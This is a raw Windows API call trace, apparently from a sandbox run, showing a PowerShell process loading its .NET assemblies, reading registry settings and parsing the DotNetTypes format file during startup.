	[0142.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.286] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x320) returned 0x0
	[0142.286] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0142.287] CoTaskMemAlloc (cb=0x5a) returned 0x1b835860
	[0142.287] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x1b835860, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0142.287] CoTaskMemFree (pv=0x1b835860) 
	[0142.287] RegCloseKey (hKey=0x320) returned 0x0
	[0142.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0142.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0142.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0142.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0142.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0142.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0142.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0142.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0142.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0142.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0142.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0142.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0142.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0142.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0142.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0142.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0142.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.191] VirtualQuery (in: lpAddress=0x1cbb20, lpBuffer=0x1cc9e0, dwLength=0x30 | out: lpBuffer=0x1cc9e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.192] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xc30d2512, Data2=0xdffd, Data3=0x4692, Data4=([0]=0xb2, [1]=0x32, [2]=0x8b, [3]=0x81, [4]=0x98, [5]=0xf5, [6]=0x50, [7]=0xd))) returned 0x0
	[0143.194] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x5e991342, Data2=0x2135, Data3=0x4e94, Data4=([0]=0xaa, [1]=0x4e, [2]=0x81, [3]=0xd7, [4]=0x5, [5]=0xa4, [6]=0x86, [7]=0xd5))) returned 0x0
	[0143.195] VirtualQuery (in: lpAddress=0x1cbcd0, lpBuffer=0x1ccb90, dwLength=0x30 | out: lpBuffer=0x1ccb90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.195] VirtualQuery (in: lpAddress=0x1cbcd0, lpBuffer=0x1ccb90, dwLength=0x30 | out: lpBuffer=0x1ccb90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.197] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x29cd08e9, Data2=0x6c6b, Data3=0x4352, Data4=([0]=0x9b, [1]=0xfe, [2]=0x3b, [3]=0x8d, [4]=0xcb, [5]=0xb6, [6]=0x34, [7]=0x2a))) returned 0x0
	[0143.199] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xdd4be2aa, Data2=0xacc8, Data3=0x41aa, Data4=([0]=0xa8, [1]=0x1c, [2]=0xcf, [3]=0x8a, [4]=0x53, [5]=0x1, [6]=0x75, [7]=0xd2))) returned 0x0
	[0143.200] VirtualQuery (in: lpAddress=0x1cbf20, lpBuffer=0x1ccde0, dwLength=0x30 | out: lpBuffer=0x1ccde0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.201] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.201] VirtualQuery (in: lpAddress=0x1cbc60, lpBuffer=0x1ccb20, dwLength=0x30 | out: lpBuffer=0x1ccb20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.201] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x592a34c9, Data2=0x6f23, Data3=0x4039, Data4=([0]=0xa3, [1]=0x9b, [2]=0x35, [3]=0x8a, [4]=0xfd, [5]=0x55, [6]=0xcd, [7]=0xbf))) returned 0x0
	[0143.201] VirtualQuery (in: lpAddress=0x1cbf20, lpBuffer=0x1ccde0, dwLength=0x30 | out: lpBuffer=0x1ccde0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.202] VirtualQuery (in: lpAddress=0x1cbd40, lpBuffer=0x1ccc00, dwLength=0x30 | out: lpBuffer=0x1ccc00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.202] VirtualQuery (in: lpAddress=0x1cb590, lpBuffer=0x1cc450, dwLength=0x30 | out: lpBuffer=0x1cc450*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.202] VirtualQuery (in: lpAddress=0x1cb590, lpBuffer=0x1cc450, dwLength=0x30 | out: lpBuffer=0x1cc450*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.202] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x3dba0983, Data2=0x7ca9, Data3=0x4ed1, Data4=([0]=0xa2, [1]=0x96, [2]=0xea, [3]=0x6d, [4]=0xda, [5]=0xc9, [6]=0x92, [7]=0x29))) returned 0x0
	[0143.203] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xe707084a, Data2=0x33e3, Data3=0x46e7, Data4=([0]=0x93, [1]=0xdb, [2]=0x46, [3]=0x9c, [4]=0xd0, [5]=0x49, [6]=0x15, [7]=0x29))) returned 0x0
	[0143.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.203] SetErrorMode (uMode=0x1) returned 0x1
	[0143.203] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0143.203] GetFileType (hFile=0x320) returned 0x1
	[0143.203] SetErrorMode (uMode=0x1) returned 0x1
	[0143.204] GetFileType (hFile=0x320) returned 0x1
	[0143.204] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.205] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.206] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.206] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.207] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.207] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.207] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.207] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.208] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.208] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.209] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.209] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.209] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.209] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.210] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.210] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.212] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x1000, lpOverlapped=0x0) returned 1
	[0143.212] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0xbce, lpOverlapped=0x0) returned 1
	[0143.212] ReadFile (in: hFile=0x320, lpBuffer=0x3454f2e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x3454f2e*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0143.212] ReadFile (in: hFile=0x320, lpBuffer=0x34557f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccff8, lpOverlapped=0x0 | out: lpBuffer=0x34557f8*, lpNumberOfBytesRead=0x1ccff8*=0x0, lpOverlapped=0x0) returned 1
	[0143.212] CloseHandle (hObject=0x320) returned 1
	[0143.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.213] SetErrorMode (uMode=0x1) returned 0x1
	[0143.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccfa0 | out: lpFileInformation=0x1ccfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0143.213] SetErrorMode (uMode=0x1) returned 0x1
	[0143.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.213] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x320) returned 0x0
	[0143.213] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd00c, lpData=0x0, lpcbData=0x1cd008*=0x0 | out: lpType=0x1cd00c*=0x1, lpData=0x0, lpcbData=0x1cd008*=0x56) returned 0x0
	[0143.213] CoTaskMemAlloc (cb=0x5a) returned 0x1b835630
	[0143.213] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccfdc, lpData=0x1b835630, lpcbData=0x1ccfd8*=0x56 | out: lpType=0x1ccfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccfd8*=0x56) returned 0x0
	[0143.213] CoTaskMemFree (pv=0x1b835630) 
	[0143.213] RegCloseKey (hKey=0x320) returned 0x0
	[0143.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.328] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xa9e3cffd, Data2=0xa211, Data3=0x4057, Data4=([0]=0x80, [1]=0x47, [2]=0x71, [3]=0xbb, [4]=0xca, [5]=0x41, [6]=0x1, [7]=0x37))) returned 0x0
	[0143.329] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0xfe711e67, Data2=0x995e, Data3=0x4d31, Data4=([0]=0x89, [1]=0x72, [2]=0xe1, [3]=0xbd, [4]=0xc2, [5]=0x15, [6]=0x4c, [7]=0x9e))) returned 0x0
	[0143.330] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x64b3fe13, Data2=0xfcb6, Data3=0x4260, Data4=([0]=0xa7, [1]=0x90, [2]=0xe4, [3]=0xda, [4]=0xbe, [5]=0xbf, [6]=0x84, [7]=0x1a))) returned 0x0
	[0143.331] CoCreateGuid (in: pguid=0x1cd2b0 | out: pguid=0x1cd2b0*(Data1=0x22cc894a, Data2=0x2c7c, Data3=0x436e, Data4=([0]=0xbd, [1]=0xe1, [2]=0x41, [3]=0xe1, [4]=0x2c, [5]=0x12, [6]=0xc5, [7]=0x1e))) returned 0x0
